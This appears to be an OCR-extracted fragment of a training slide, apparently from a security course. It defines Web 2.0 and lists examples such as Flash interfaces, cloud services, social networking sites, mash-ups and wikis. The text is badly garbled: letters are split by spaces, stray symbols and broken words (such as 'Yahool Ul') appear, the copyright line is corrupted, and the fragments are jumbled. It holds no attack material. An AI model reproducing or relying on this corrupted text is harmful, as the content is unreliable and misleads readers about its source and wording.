Flash rich interface websites O

F ra m e w o rk s (Yahool Ul v‫ ״‬..r id'‫?»«'׳׳‬

Cloud computing websites like

Q Google Base and other free Web services

C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .

W e b 2.0 re fe rs to a n e w g e n e ra tio n o f w e b a p p lic a tio n s th a t p ro v id e an in fra s tru c tu re

© A dvan ced g am ing

© D ynam ic as oppose d to s ta tic site c o n te n t

© Social n e tw o rk in g sites (Flickr, Facebook, d el.cio.us)

© M ash -u ps (em ails, IM s, e le c tro n ic p a y m e n t system s)

© W ikis and o th e r c o lla b o ra tiv e a p p lic a tio n s